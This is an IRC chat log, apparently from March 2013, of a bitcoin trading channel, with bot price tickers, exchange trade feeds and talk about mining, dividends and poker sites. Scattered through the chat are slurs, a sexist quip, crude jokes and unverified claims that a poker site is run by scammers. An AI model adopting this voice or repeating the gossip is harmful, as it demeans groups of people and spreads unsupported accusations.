you the last bet for 1btc? Mar 05 02:18:15 yes Mar 05 02:18:28 yeah Mar 05 02:18:52 good timing Mar 05 02:19:03 [HAVELOCK] [SDICE] 4 @ 0.6295 = 2.518 BTC [+] Mar 05 02:19:10 did you include a mining fee? Mar 05 02:19:17 when you sent your bet? Mar 05 02:19:24 I sent via Coinbase.com Mar 05 02:19:49 you should not keep coins there. buy them, and MOVE THEM. Mar 05 02:20:15 great way to get your hands on them. poor way to store them. Mar 05 02:23:32 unless interested in privacy Mar 05 02:23:35 btw Mar 05 02:23:59 http://polimedia.us/dtng/c/src/136243652861.jpg Mar 05 02:24:02 pic unrelated. Mar 05 02:24:29 flexible Mar 05 02:28:08 what happened with PrimeAsic? Mar 05 02:28:09 legit? Mar 05 02:28:41 we don't know yet. Mar 05 02:28:53 bitbet says like 100:1 legit, but i dunno. Mar 05 02:29:25 i like those odds Mar 05 02:32:04 [HAVELOCK] [SDICE] 1 @ 0.6295 BTC [+] Mar 05 02:33:02 [MPEX] [O.BTCUSD.P750T] 1000 @ 1.12260046 = 1122.6005 BTC [-] Mar 05 02:38:00 [BTCTC] [GSDPT] 96 @ 0.0061 = 0.5856 BTC [+] Mar 05 02:38:02 [BTCTC] [GSDPT] 564 @ 0.00617 = 3.4799 BTC [+] Mar 05 02:44:20 [BTCTC] [ASICMINER-PT] 3 @ 0.65 = 1.95 BTC [-] Mar 05 02:44:40 [MPEX] [O.BTCUSD.P750T] 1000 @ 1.12080012 = 1120.8001 BTC [-] Mar 05 02:45:14 eh Mar 05 02:45:19 this has all the makings of adventuer Mar 05 02:47:16 [BTCTC] [COGNITIVE] 6 @ 0.3 = 1.8 BTC [+] Mar 05 02:52:52 [BTCTC] [BASIC-MINING] 6 @ 0.34499 = 2.0699 BTC [+] Mar 05 02:54:42 [BTCTC] [GSDPT] 100 @ 0.00617 = 0.617 BTC [+] Mar 05 02:58:32 [BTCTC] [ASICMINER-PT] 2 @ 0.65 = 1.3 BTC [-] Mar 05 02:58:49 .65 hey Mar 05 03:02:48 36.40 nbd Mar 05 03:10:23 ;;ticker Mar 05 03:10:23 BTCUSD ticker | Best bid: 36.22123, Best ask: 36.40000, Bid-ask spread: 0.17877, Last trade: 36.40000, 24 hour volume: 47630.33370173, 24 hour low: 34.19000, 24 hour high: 36.70000, 24 hour vwap: 35.51830 Mar 05 03:10:37 wow.. i really should sleep more often Mar 05 03:10:45 [MPEX] [S.MPOE] 34600 @ 0.00075 = 25.95 BTC [-] Mar 05 03:10:50 ltc too... Mar 05 03:21:52 a wild libertard appears http://dailyreckoning.com/boycott-bitcoin/ Mar 05 03:35:35 hey, i need 3 mate to try poker at https://strikesapphire.com/ Mar 05 03:36:00 freeroll in 20min but need 4 players to start Mar 05 03:41:02 I'll login Mar 05 03:41:02 dub sign bitcoin's breaking into mainstream Mar 05 03:41:13 error4733 who runs that ? Mar 05 03:43:52 Ooh. quite a huge buy Mar 05 03:44:11 where? Mar 05 03:44:31 oh , i was talking about dice Mar 05 03:45:46 ;;ticker Mar 05 03:45:48 BTCUSD ticker | Best bid: 36.39746, Best ask: 36.39929, Bid-ask spread: 0.00183, Last trade: 36.39930, 24 hour volume: 47668.19097261, 24 hour low: 34.19000, 24 hour high: 36.70000, 24 hour vwap: 35.52726 Mar 05 03:46:27 hey anyone selling BTC in AUD? yeah i've tried otc Mar 05 03:47:10 maybe ukto Mar 05 03:47:28 hmmm nah Mar 05 03:47:33 maybe mircea Mar 05 03:53:20 [BTCTC] [S.MPOE-PT] 4 @ 0.00078 = 0.0031 BTC [+] Mar 05 03:56:07 [BTCTC] [S.BBET-PT] 1 @ 0.00196 BTC [-] Mar 05 03:56:08 [BTCTC] [S.BBET-PT] 100 @ 0.00196 = 0.196 BTC [-] Mar 05 03:56:10 [BTCTC] [S.BBET-PT] 100 @ 0.00195 = 0.195 BTC [-] Mar 05 03:56:12 [BTCTC] [S.BBET-PT] 30 @ 0.00195 = 0.0585 BTC [-] Mar 05 03:57:45 ;;asks 1000 Mar 05 03:57:52 There are currently 62067.62 bitcoins offered at or under 1000.0 USD, worth 6529233.27387 USD in total. | Data vintage: 0.0033 seconds Mar 05 03:58:22 who has 6 million fiat on gox? Mar 05 03:59:31 [MPEX] [S.MPOE] 5000 @ 0.00075 = 3.75 BTC [-] Mar 05 04:00:20 ;;ticker Mar 05 04:00:21 BTCUSD ticker | Best bid: 36.16100, Best ask: 36.35000, Bid-ask spread: 0.18900, Last trade: 36.39999, 24 hour volume: 46677.07588137, 24 hour low: 34.19000, 24 hour high: 36.70000, 24 hour vwap: 35.55065 Mar 05 04:00:32 just an ordinary day in bitcoinland Mar 05 04:00:32 [MPEX] [S.MPOE] 5000 @ 0.00075 = 3.75 BTC [-] Mar 05 04:02:45 [MPEX] [O.BTCUSD.P750T] 1000 @ 1.11601409 = 1116.0141 BTC [-] Mar 05 04:07:53 sorry Namworld.. i forgot about asking here... I just want so see if it's better than sealclub Mar 05 04:09:55 mp : https://bitcointalk.org/index.php?topic=137440.msg1465041#msg1465041 Mar 05 04:12:27 [MPEX] [O.BTCUSD.P750T] 1000 @ 1.11601409 = 1116.0141 BTC [-] Mar 05 04:15:29 error4733: haven't been on there for a while, have they actually got players these days? used to be a ghost town Mar 05 04:15:49 ;;calc 47.08908/2000 Mar 05 04:15:50 0.02354454 Mar 05 04:16:21 I for one support any site that takes users away from micon Mar 05 04:17:42 micron sold it right? Mar 05 04:17:54 seals? Mar 05 04:17:59 i thought so Mar 05 04:18:05 he's the pro, he didn't own it Mar 05 04:18:07 i might be wrong Mar 05 04:18:18 okay, well who ever had it i think sold it Mar 05 04:18:35 oh, I stopped playing there because he's an assclown Mar 05 04:18:46 <[\\\]> micon never owned seals afaik Mar 05 04:18:51 when your paid pro gets business to stop playing lol Mar 05 04:18:58 <[\\\]> he was just a talking head Mar 05 04:19:21 i just remeber reading about seals being sold, i dont know by whom or to whom Mar 05 04:19:33 way to spread the facts ;) Mar 05 04:19:42 i try! Mar 05 04:20:36 Seals is run by shady poker scammers Mar 05 04:20:41 I like this ssaCEO's style however, he's like the al swearengen of pr Mar 05 04:21:04 According to a friend who knows them from way back in poker land Mar 05 04:22:28 this channel is the no gossip express today Mar 05 04:22:33 <[\\\]> cocksucka! Mar 05 04:22:42 <[\\\]> Wu! Mar 05 04:23:11 [MPEX] [O.BTCUSD.P750T] 1000 @ 1.11601409 = 1116.0141 BTC [-] Mar 05 04:23:28 ltc is not a btc assets but anyone know why it went up 100% in 1.5 days? Mar 05 04:24:02 kimdotcom is accepting it for mega and pirate will pay everyone back in ltc Mar 05 04:25:00 <[\\\]> Chaang-Noi: same reason bitcoin has gone up 5% a day for the last several weeks. Mar 05 04:25:15 I think more likely because eskimobobs ugly mug mining operation is getting underway Mar 05 04:25:37 i've got one of those mugs and it is gorgeous actually Mar 05 04:26:03 but eskimobobs ugly mug mining operation sounds better Mar 05 04:26:08 <[\\\]> its like calling a chunk of frozen tundra greenland Mar 05 04:26:20 <[\\\]> and a chunk of beautiful land iceland Mar 05 04:27:31 pigeons the mug is pretty cool? Mar 05 04:27:54 ill have to look into getting one Mar 05 04:28:00 yeah i already posted pictures maybe again later Mar 05 04:28:14 oh, yeah if you do send link please, thanks Mar 05 04:28:27 inb4 the mug gives you aids Mar 05 04:28:51 lol, are we all drunk/high on caffine today? :) Mar 05 04:29:12 or did i miss out on a meme Mar 05 04:29:40 <[\\\]> high on rice Mar 05 04:30:02 i don't think its aids, i think maybe i just have mono Mar 05 04:30:23 ahh, pigeons is sick, sorry to hear that man Mar 05 04:30:54 but its a pretty mug Mar 05 04:31:11 pretty fucking ugly Mar 05 04:31:58 beer mug, coffee mug? Mar 05 04:32:09 aids mug Mar 05 04:32:13 <[\\\]> mug shot Mar 05 04:32:32 lol, Mar 05 04:40:02 [MPEX] [S.MPOE] 5815 @ 0.00074361 = 4.3241 BTC [-] Mar 05 04:44:02 [MPEX] [O.BTCUSD.P750T] 1000 @ 1.11362916 = 1113.6292 BTC [-] Mar 05 04:45:34 [BTCTC] [S.DICE-PT] 5 @ 0.00614 = 0.0307 BTC [+] Mar 05 04:45:49 srsly though a home made out of who knows what mixture of clay, mud and the feces eskimoboob probably smears all over himself Mar 05 04:46:58 poorly glazed, porous, harbouring all manner bacteria and auto-immune disease Mar 05 04:48:04 be prepared for a slow and painful death shitting yourself inside out from dysentery Mar 05 04:51:58 [MPEX] [O.BTCUSD.P750T] 1000 @ 1.11303376 = 1113.0338 BTC [-] Mar 05 04:52:12 some big fucking positions Mar 05 04:52:12 dub srsly ? Mar 05 04:52:49 i been sorta watching his venture peripherally, i find the idea rather amusing Mar 05 04:53:09 well, if you are comfortable easting your cornflakes out of any random homless persons asshole then go right ahead Mar 05 04:53:10 Bugpowder_ like 5k went today Mar 05 04:53:16 7k Mar 05 04:53:18 in food hygene terms its the same thing Mar 05 04:53:21 so far Mar 05 04:53:25 going to 10k Mar 05 04:53:27 probably Mar 05 04:53:32 yah right you are Mar 05 04:53:35 definitely record month Mar 05 04:53:48 and it's only the 5th o wow. Mar 05 04:54:22 <[\\\]> congrats Mar 05 04:54:27 <[\\\]> give the girl a raise Mar 05 04:54:29 i wonder if i'm gonna live to regret these Mar 05 04:54:52 worst racket in the world, if you have no trade you're depressed, if you get trade you're worried. Mar 05 04:55:42 dub it's amusing inasmuch as there's this new trend among the terminally retarded lefties Mar 05 04:55:46 "make art a business" Mar 05 04:55:59 as fucking if a. what they did was art and b. you can make money at art w/o an elite Mar 05 04:56:06 mircea_popescu: hey if he can scrape a living out of exploiting hippies thats fine. Putting anything you plan to ingest in a home made pottery receptacle is gastric russian roulette Mar 05 04:56:09 it's so broken i can't put it in words Mar 05 04:56:25 dub right, cause the hippies have dough. Mar 05 04:56:29 through the process of what ? alchemy ? Mar 05 04:56:40 its not my model bro Mar 05 04:56:46 unless he starts distributing tokes as dividends... Mar 05 04:57:10 <[\\\]> wait, you invested in dankbank? Mar 05 04:57:46 someone invested in that ? Mar 05 04:58:53 as long has pigeons has exploding colon insurance he'll be fine too Mar 05 04:59:10 you know there's some vitamin that you only get by eating dirt basically ? Mar 05 04:59:32 <[\\\]> yeah, its called "vitamin stupid" Mar 05 04:59:36 no dood. Mar 05 04:59:42 vitamin lysteria Mar 05 04:59:48 http://www.google.com/search?q=vitamin+dirt&complete=0 Mar 05 04:59:53 ahaha totally. vitamin b. haters. Mar 05 04:59:53 er listeria Mar 05 05:01:20 firstly there's no vitamin b its a group of vitamins and you get them from lots of places Mar 05 05:01:26 dirt! Mar 05 05:01:28 [MPEX] [O.BTCUSD.P750T] 1000 @ 1.11124958 = 1111.2496 BTC [-] Mar 05 05:01:46 well really, some bacteria which unlike us can synthesize it Mar 05 05:02:49 eatign dirt is not a good idea, listeria is a very nasty way to die Mar 05 05:03:50 need vit. b? drink red bull you'll live longer Mar 05 05:05:56 [BTCTC] [BITVPS] 1 @ 0.00408 BTC [-] Mar 05 05:07:03 [BTCTC] [ASICMINER-PT] 14 @ 0.65 = 9.1 BTC [-] Mar 05 05:07:53 [BTCTC] [S.DICE-PT] 91 @ 0.00614 = 0.5587 BTC [+] Mar 05 05:09:53 36.8 crazy Mar 05 05:10:09 oh shit asicminer-pt is trading:) Mar 05 05:10:40 i just got some on BitFunder Mar 05 05:10:52 what is it trading at bitfunder? Mar 05 05:11:01 same price i think Mar 05 05:11:08 cool, .65 is a good number Mar 05 05:11:57 what is the webiste for btctc ? Mar 05 05:12:45 [BTCTC] [S.DICE-PT] 49 @ 0.00615 = 0.3014 BTC [+] Mar 05 05:13:22 i dont know the name of that other exchange :/ Mar 05 05:13:28 this might sound really n00b but is there a way to exchange between PT's Mar 05 05:13:51 No, not really, why? Mar 05 05:14:06 btct.co Mar 05 05:14:21 What PT do you hold? Mar 05 05:14:21 you could but it would be a pain in the ass Mar 05 05:14:41 for example say i want an asset on BF but i only have a mpex account but i could buy an asset on BF using or leveraging an asset i have on MPEX to buy that asset on BF Mar 05 05:15:18 Not sure I understand what you mean... Mar 05 05:15:45 havelock has just implemented that Mar 05 05:15:47 i dont know like i said i'm probably being a real n00b Mar 05 05:15:54 (if I understood correctly) Mar 05 05:15:59 Don't trust havelock Mar 05 05:16:13 Havelock is controlled by the Borg. Mar 05 05:16:30 [BTCTC] [BASIC-MINING] 1 @ 0.34499 BTC [+] Mar 05 05:17:11 !ticker m S.MPOE Mar 05 05:17:12 [MPEX:S.MPOE] 1D: 0.00074361 / 0.00075087 / 0.00078628 (2432192 shares, 1,826.28 BTC), 7D: 0.0007147 / 0.00075245 / 0.00078628 (3534723 shares, 2,659.72 BTC), 30D: 0.0006153 / 0.00067759 / 0.00078628 (62988367 shares, 42,680.30 BTC) Mar 05 05:17:15 [MPEX] [O.BTCUSD.P750T] 1000 @ 1.1100618 = 1110.0618 BTC [-] Mar 05 05:17:15 ahh okey dub Mar 05 05:18:09 !ticker m ^OIX Mar 05 05:18:10 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 29.08490939 / 41.20198681 / 46.0855546 (no shares, 6,242.04 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Mar 05 05:18:22 some S.DICE-PT available for 0.00599 Mar 05 05:18:44 ;;ticker Mar 05 05:18:44 BTCUSD ticker | Best bid: 36.85901, Best ask: 36.89300, Bid-ask spread: 0.03399, Last trade: 36.89300, 24 hour volume: 48595.38328206, 24 hour low: 34.34200, 24 hour high: 36.90000, 24 hour vwap: 35.65034 Mar 05 05:18:59 hmm Mar 05 05:19:17 what, we're already hitting 37 Mar 05 05:21:16 not fun for me, since i start in december Mar 05 05:21:29 it was ALWAYS rally time Mar 05 05:21:54 I bought in at 5 USD and 10 USD Mar 05 05:22:01 and sold at ? Mar 05 05:22:24 Haven't sold, lost them to some bad "miner" Mar 05 05:22:29 Mostly Mar 05 05:22:36 sick Mar 05 05:22:44 but u're still in Mar 05 05:22:47 bad miner? Mar 05 05:22:53 [MPEX] [S.DICE] 100 @ 0.00584168 = 0.5842 BTC [-] Mar 05 05:23:07 bad invest in ASCISMINER right ? Mar 05 05:24:04 error4733 give it time, it may collapse once more. Mar 05 05:24:19 ASICMINER is selling for 6x what it IPOed at Mar 05 05:24:53 mp : obv, i'm not like i bet my house on infinite rally Mar 05 05:25:08 in fact yes, but it's a other question Mar 05 05:25:38 i hope a crash for a good re entry spot Mar 05 05:25:41 lol wghat ?! Mar 05 05:26:10 i'm going to make a long term 100 play Mar 05 05:26:19 so anything under 100$ is good enough for me Mar 05 05:26:29 lets do it Mar 05 05:26:51 so u mining with gpu ? Mar 05 05:27:45 no, was lending to Amazingrando, waiting to have enough for a BFL rig. But Amazingrando never repaid. Mar 05 05:28:04 when i should stop mining with GPU if i thinks BTC'll hit 200$ ? Mar 05 05:28:33 how much does your power cost Mar 05 05:28:36 i never start but Mar 05 05:28:57 if you never started then don't start. Mar 05 05:29:02 so i guess PrimeAsic was fake? Mar 05 05:29:08 BitHub why ? Mar 05 05:29:22 that's what i'm asking Mar 05 05:29:23 was it? Mar 05 05:29:32 !ticker .sbbet Mar 05 05:29:32 The round stones beneath the earth... have spoken through the fire. Mar 05 05:29:32 site's down Mar 05 05:29:41 ;;ticker Mar 05 05:29:42 BTCUSD ticker | Best bid: 36.82002, Best ask: 36.94000, Bid-ask spread: 0.11998, Last trade: 36.80000, 24 hour volume: 49186.53224211, 24 hour low: 34.34200, 24 hour high: 37.00000, 24 hour vwap: 35.67406 Mar 05 05:29:48 37 wow Mar 05 05:29:50 afaik we don't know yet. Mar 05 05:29:59 ;;ticker s.bbet Mar 05 05:29:59 (ticker [--bid|--ask|--last|--high|--low|--avg] [--currency XXX]) -- Return pretty-printed mtgox ticker. If one of the result options is given, returns only that numeric result (useful for nesting in calculations). If '--currency XXX' option is given, returns ticker for that three-letter currency code. It is up to you to make sure that the three letter code you enter is a valid currency (1 more message) Mar 05 05:30:07 !ticker m s.bbet Mar 05 05:30:09 [MPEX:S.BBET] 1D: 0.0015 / 0.00175636 / 0.00197 (76200 shares, 133.83 BTC), 7D: 0.0015 / 0.00176507 / 0.00197 (79498 shares, 140.32 BTC), 30D: 0.0003 / 0.00165614 / 0.00197 (128608 shares, 212.99 BTC) Mar 05 05:30:18 thanks! Mar 05 05:30:22 ahhh okey Mar 05 05:30:44 bitbet bet gives them good odds of being real, but i dunno. Mar 05 05:30:56 [MPEX] [O.BTCUSD.P750T] 375 @ 1.10887536 = 415.8283 BTC [-] Mar 05 05:33:21 [BTCTC] [B.YABMC] 1 @ 0.00878 BTC [+] Mar 05 05:33:41 error4733: if you had cheap power and efficient GPUs you're good till around 100mn diff Mar 05 05:36:11 neither of the two... Mar 05 05:36:18 sooo, is that the end of it ? Mar 05 05:36:28 thinks so Mar 05 05:36:50 hmmmm Mar 05 05:38:41 but i want try, i think it's a good way to learn BTC Mar 05 05:41:04 don't care about the 0.000000475 btc/day Mar 05 05:41:52 good way also to understand altcoin, why is good, why is a scam Mar 05 05:42:18 not sure it is tbh, theres also teh heat, noise, decreased MTBF of your hardware Mar 05 05:43:45 might be fun to give it a try but I wouldn't be buying new GPUs at this point unless you plan to pwn n00bs with them on the side Mar 05 05:43:58 [MPEX] [S.DICE] 5000 @ 0.00561 = 28.05 BTC [-] Mar 05 05:44:00 [MPEX] [S.DICE] 2000 @ 0.00560001 = 11.2 BTC [-] Mar 05 05:44:02 [MPEX] [S.DICE] 400 @ 0.005501 = 2.2004 BTC [-] Mar 05 05:44:03 [MPEX] [S.DICE] 200 @ 0.005501 = 1.1002 BTC [-] Mar 05 05:44:05 [MPEX] [S.DICE] 100 @ 0.0055 = 0.55 BTC [-] Mar 05 05:44:16 [MPEX] [S.DICE] 19900 @ 0.0054 = 107.46 BTC [-] Mar 05 05:44:56 no one be objective with altcoin bc they old one but hate the new one, etc Mar 05 05:48:40 og fuck yeah http://www.namecheap.com/support/payment-options/bitcoin.aspx Mar 05 05:49:22 ok, that's great. Mar 05 05:50:10 hey guys, do you know any MT4 trading platforms that allow leverage and would let you have a live account with not that much money? Mar 05 05:50:30 thismustb kakobrekla's thing maybe ? Mar 05 05:50:43 yea thats why i went to this channel but his site says 50BTC min deposit Mar 05 05:50:48 that's a bit steep at current rates Mar 05 05:51:03 hm Mar 05 05:51:12 i use namecheap, can wait to pay my next bills :) Mar 05 05:51:17 wasn't he saying something about deci bitcoin lots or something ? Mar 05 05:51:48 hehe i dont know, i've only traded forex before, no experience in btc yet Mar 05 05:52:06 i just forgot 40$ in bitcoins about a year ago. then i saw btc is at 36$ now Mar 05 05:52:12 opened my BTC and bam 400$ Mar 05 05:52:19 i was like wow, i should just try trading that Mar 05 05:53:42 haha Mar 05 05:55:00 https://twitter.com/Mircea_Popescu/status/308235762103644161 Mar 05 05:55:05 tweeter liked that one lol Mar 05 05:55:31 You guys don't celebrate? We just broke $37! :) Mar 05 05:55:33 dude.. that picture Mar 05 05:55:56 dub which ? Mar 05 05:55:57 you are a fucking baller Mar 05 05:55:59 ;;ticker Mar 05 05:55:59 BTCUSD ticker | Best bid: 36.80002, Best ask: 36.99960, Bid-ask spread: 0.19958, Last trade: 36.99960, 24 hour volume: 49556.91047748, 24 hour low: 34.34200, 24 hour high: 37.00000, 24 hour vwap: 35.70360 Mar 05 05:56:03 yes im a baller lol Mar 05 05:56:07 the background Mar 05 05:56:25 that was me in mexico, eating chocolate bonbons in the street Mar 05 05:56:47 with like, a red purse, white suit. sent it back home the agape silence could be heard across the ocean. Mar 05 05:57:48 [BTCTC] [GSDPT] 2 @ 0.00616 = 0.0123 BTC [-] Mar 05 05:59:01 the photo is quite epic indeed Mar 05 06:00:22 it's fair tho, girl was carying my jacket, so. Mar 05 06:00:46 are you wearing her pants too? Mar 05 06:01:03 no, those are my pants., Mar 05 06:01:06 girls don't get pants. Mar 05 06:02:35 [BTCTC] [ASICMINER-PT] 11 @ 0.65 = 7.15 BTC [-] Mar 05 06:02:58 go asic miner :) Mar 05 06:03:40 i dont understand why people are buying on btct when they are 100% divs on BF Mar 05 06:03:51 at same price Mar 05 06:04:29 they prefer the design. Mar 05 06:04:31 trust in the exchange Mar 05 06:04:57 if i used one already id not make a new account for 10 shares and just lose the 5% Mar 05 06:05:40 trust could be an answer Mar 05 06:05:57 hopfully soon there will be more reasons to want one exchange over another, at least regarding the services that the exchange offers. >:P Mar 05 06:06:26 i have nothing against either, but i do find myself on BF more and more Mar 05 06:07:38 Namworld gets props for being the fastes sdice PT div payer Mar 05 06:09:06 I try to give dividends the same day. Mar 05 06:09:48 I even got the div on S.MPOE out before it was actually made Mar 05 06:10:22 that's nice. Mar 05 06:10:30 took me a couple days to notice that one Mar 05 06:10:54 maybe i should pay negative divs Mar 05 06:11:11 LOL Mar 05 06:11:15 should make the price go up higher Mar 05 06:12:08 bit tit ?! Mar 05 06:12:24 BitIT probly Mar 05 06:13:41 a while back the girl went on some stripper forum to give them free btc Mar 05 06:13:45 the airheads wouldn't take it. Mar 05 06:13:53 i guess there's no bit tit ;/ Mar 05 06:14:09 that was a good read Mar 05 06:14:46 that was your girl? Mar 05 06:14:58 dub "that" Mar 05 06:15:20 the dilemma of cluelessness. if you give it free then it must be worthless or else you wouldn't give it for free. if you sell it then it's not worth it. Mar 05 06:15:23 on the cam girl forum Mar 05 06:15:31 trying to go through life without a head must be painful. Mar 05 06:15:39 dub mpoe-pr is mpoe-pr ya know ? Mar 05 06:15:55 yeesh 37.34 already Mar 05 06:16:00 ;;ticker Mar 05 06:16:01 BTCUSD ticker | Best bid: 37.21510, Best ask: 37.34000, Bid-ask spread: 0.12490, Last trade: 37.21510, 24 hour volume: 50374.26609504, 24 hour low: 34.34200, 24 hour high: 37.34000, 24 hour vwap: 35.73039 Mar 05 06:16:27 shit's crazy Mar 05 06:16:33 when do we start to worry Mar 05 06:16:35 I'm pondering what price should I leave a sell order at for the night. Mar 05 06:16:39 i'd say if it goes over 100 Mar 05 06:16:42 seems like it can't end now Mar 05 06:16:53 everyone be speculatin Mar 05 06:17:01 50 i would guess is possible, but over 100 is bubble territory. Mar 05 06:17:08 but can't we reach the sungularity soon Mar 05 06:17:19 I think we've just begun attracting the Wall Street guys into it. Mar 05 06:17:26 singularity Mar 05 06:17:31 it looks like to me all the bears who tried to sell are gone... we dont even get small correctios anymore Mar 05 06:17:48 i think eduard is right, Mar 05 06:17:57 and also the mega guys... Mar 05 06:18:05 ya, all those millions coinlab is selling. Mar 05 06:18:11 ;;asks 50 Mar 05 06:18:11 There are currently 18100.683 bitcoins offered at or under 50.0 USD, worth 776692.059089 USD in total. | Data vintage: 67.7184 seconds Mar 05 06:18:21 that's nothing Mar 05 06:18:26 You kinda get a sort of correction, but it's not much to scalp. Mar 05 06:18:55 I do try to scalp a bit though, I don't make a lot compared to the trend, but it's still something. Mar 05 06:19:08 i don;t under stand why some millionaire hasn't bought it into oblivion yet Mar 05 06:19:31 Because volatility... Mar 05 06:19:43 they are not millionaires for nothing. well, not most Mar 05 06:19:44 But as time passes that may become less of a problem. Mar 05 06:19:46 and what about MP? Mar 05 06:19:48 I think to be safe some millionair would need to buy a proper dev team first Mar 05 06:19:49 he has lots of btc Mar 05 06:19:50 :P Mar 05 06:20:14 now lite coin is .00353btc/.125usd Mar 05 06:20:26 sry .00367btc Mar 05 06:20:27 failure there is the biggest risk imo Mar 05 06:20:36 i heart ltc Mar 05 06:20:52 sold some btc to buy wife a truck, then made it back in one day with ltc Mar 05 06:21:35 lol, i doubt im worth anything Mar 05 06:21:44 most people pay to get rid of me! :) Mar 05 06:22:07 of course, all this was foretold http://trilema.com/2013/bitcoin-prices-bitcoin-inflexibility/ Mar 05 06:25:40 "As a complete aside: putting a 5mn BTC buywall @ $200 each up in MtGox might actually be the most rational use of a billion dollars currently. You'll end up with 2-3 mn BTC and the price will be permanently in the hundreds. Profit." Mar 05 06:25:47 https://bitcointalk.org/index.php?topic=130941.msg1403357#msg1403357 Mar 05 06:26:25 mircea_popescu: what's your background btw? Anything economics-related or not? Mar 05 06:26:45 physics adn philosophy. Mar 05 06:27:17 Interesting. Mine's systems / control engineering, though I'm mostly a software dude. Mar 05 06:27:36 has missed that article thx Mar 05 06:27:38 had Mar 05 06:28:09 i imagine the bit time alt coins wars is a likely part of butcoins future Mar 05 06:28:13 i was in what they called at the time a "suprareal" class in highschool. basically romania's gifted kids programme. Mar 05 06:28:14 liek a Google coin Mar 05 06:28:18 or a US altcoin Mar 05 06:28:23 EU altcoin Mar 05 06:28:24 etc Mar 05 06:28:32 got admitted to bbu with 10 on grounds of olympiads Mar 05 06:28:44 and finished philosophy/antrhopology at aiu Mar 05 06:31:17 typing like shit tonight... not exactly sober Mar 05 06:31:37 Nice, mircea_popescu. Mar 05 06:37:53 hey mircea_popescu you there? Mar 05 06:38:03 any chance you can approve my withdraw so i can pay my dividends? :) Mar 05 06:39:37 yeah Mar 05 06:40:23 thanks! Mar 05 06:41:21 think someone was trying to be sneaky and push units from mpex->havelock to get the dividend twice Mar 05 06:41:41 pay dividend first, THEN ill approve the push :) Mar 05 06:41:53 i guess thats a "gotcha" for automatic push processing Mar 05 06:41:59 haha Mar 05 06:42:02 yeah totally. Mar 05 06:42:31 too much automation isn't healthy in finance anyway Mar 05 06:43:53 course it may be a good idea to just ignore the thing and let people fleece you. Mar 05 06:44:22 paying a 2% for new business may not be a bad deal, and besides, people value a dollar they think they stole above one they had to earn. Mar 05 06:44:41 haha thats true Mar 05 06:51:28 excellent dividend paid... g'nite Mar 05 06:52:12 (and pending mpex push approved) Mar 05 06:58:55 ;;tslb Mar 05 06:58:57 Time since last block: 1 minute and 1 second Mar 05 06:59:04 is it me or are blocks incredibly fast. Mar 05 06:59:42 ;;bc,stats Mar 05 06:59:44 Current Blocks: 224327 | Current Difficulty: 4367876.000842196 | Next Difficulty At Block: 225791 | Next Difficulty In: 1464 blocks | Next Difficulty In About: 1 week, 1 day, 19 hours, 39 minutes, and 45 seconds | Next Difficulty Estimate: 4826833.94454 | Estimated Percent Change: 10.50758 Mar 05 07:00:01 we had 7 blocks in 15 mins last night... Mar 05 07:00:12 10% huh. Mar 05 07:00:13 14 hours ago Mar 05 07:00:38 so basically, 1k blocks went by in 2 days ? Mar 05 07:01:24 closer to 8500? Mar 05 07:01:36 lol wait what? Mar 05 07:01:49 iirc about 2 days ago we were just starting this current diff Mar 05 07:01:50 1 blocks in 2 days? Mar 05 07:01:56 1k = 1000 Mar 05 07:01:56 maybe something to do with why the diff est was so high at first Mar 05 07:02:15 ;;tslb Mar 05 07:02:15 i dont think we did 1k blocks in 2 days, thats crazy Mar 05 07:02:17 Time since last block: 4 minutes and 22 seconds Mar 05 07:02:41 288 blocks are normal for 2 days Mar 05 07:03:09 1k in 2 days is 4004 normal Mar 05 07:03:11 400$ Mar 05 07:03:12 we did ~480 in the past 48 hours Mar 05 07:03:16 fuck,,, 400% Mar 05 07:03:26 480 i could buy that... 1k no ;) Mar 05 07:03:35 i was just guessing. Mar 05 07:03:55 yeah i knew it was higher than normal but seemed pretty high even for a ballpark guess Mar 05 07:04:16 i saw the 7 block in 15 mins and was like shiiit... Mar 05 07:04:25 ;;tslb Mar 05 07:04:27 Time since last block: 6 minutes and 32 seconds Mar 05 07:04:34 ok this is more normal Mar 05 07:04:38 http://blockchain.info/ last 7 blocks and time Mar 05 07:04:56 6, 8, 13, 38, 42, 46, and 52 mins ago Mar 05 07:05:02 fast but somehwat close to normal Mar 05 07:05:43 8 instead of 6 Mar 05 07:06:36 https://twitter.com/rogerkver/status/308799432818839552 Mar 05 07:06:44 hehe ver is late Mar 05 07:08:09 yeah he is Mar 05 07:08:18 but still, cant hurt to post Mar 05 07:08:43 absolutely. Mar 05 07:08:45 its a significant site for tech type people Mar 05 07:10:13 http://endthelie.com/2013/02/28/ulterior-motives-behind-the-copyright-alert-system/#axzz2MdgHZkPO Mar 05 07:10:16 this is hysterical. Mar 05 07:10:30 Brooke: What happens if you get 7, 8 and 9 strikes? Mar 05 07:10:30 Jill: We hope by the time people get to alerts 5 or 6, they’ll stop. Once they’ve been mitigated, once they received several alerts, we’re just not going to send them any more alerts because they’re not the kind of customer we’re going to reach with this program Mar 05 07:10:35 what the fuck is this bs. Mar 05 07:11:15 "Once they’ve been mitigated" Mar 05 07:11:19 tor everything :/ Mar 05 07:11:19 have you been mitigated ? Mar 05 07:12:21 these guys have the right idea, www.bitfetch.com Mar 05 07:12:57 0.005 BTC / GB Mar 05 07:13:09 so basically pay them the 15 cents per movie that the miaa won't take. Mar 05 07:13:17 was their not already a bitcoin service taht did this? Mar 05 07:13:26 why not just get netflix Mar 05 07:13:40 youc an dl any torrent Mar 05 07:13:43 apps, etc Mar 05 07:13:44 my parents in the us got rid of tv and got netflixs Mar 05 07:13:51 also netflix doesnt have everything Mar 05 07:13:54 they dont pirate... Mar 05 07:14:05 what is netflixs each month? Mar 05 07:14:12 $10? Mar 05 07:14:18 i have it and i dont know Mar 05 07:14:21 ahh cable tv was like $60 Mar 05 07:14:21 cheap Mar 05 07:14:28 i see why they moved Mar 05 07:14:35 they dont even watch much tv... Mar 05 07:14:36 fukn comcast cable package is like $150 or some shit Mar 05 07:14:44 yeah Mar 05 07:14:57 if i go back to the usa ill get google fiber Mar 05 07:16:58 looks like assbot is dead Mar 05 07:17:26 or no action? Mar 05 07:17:36 !ticker assbot is dead Mar 05 07:17:46 hmm Mar 05 07:17:47 totally. Mar 05 07:18:50 37.70 Mar 05 07:19:03 ;;ticker Mar 05 07:19:03 BTCUSD ticker | Best bid: 37.25001, Best ask: 37.37400, Bid-ask spread: 0.12399, Last trade: 37.37400, 24 hour volume: 51650.54746078, 24 hour low: 34.34200, 24 hour high: 37.70000, 24 hour vwap: 35.79829 Mar 05 07:19:38 40 in 